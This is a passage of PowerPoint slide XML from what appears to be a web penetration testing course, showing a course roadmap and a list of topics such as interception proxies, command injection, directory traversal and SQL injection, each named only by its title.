                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
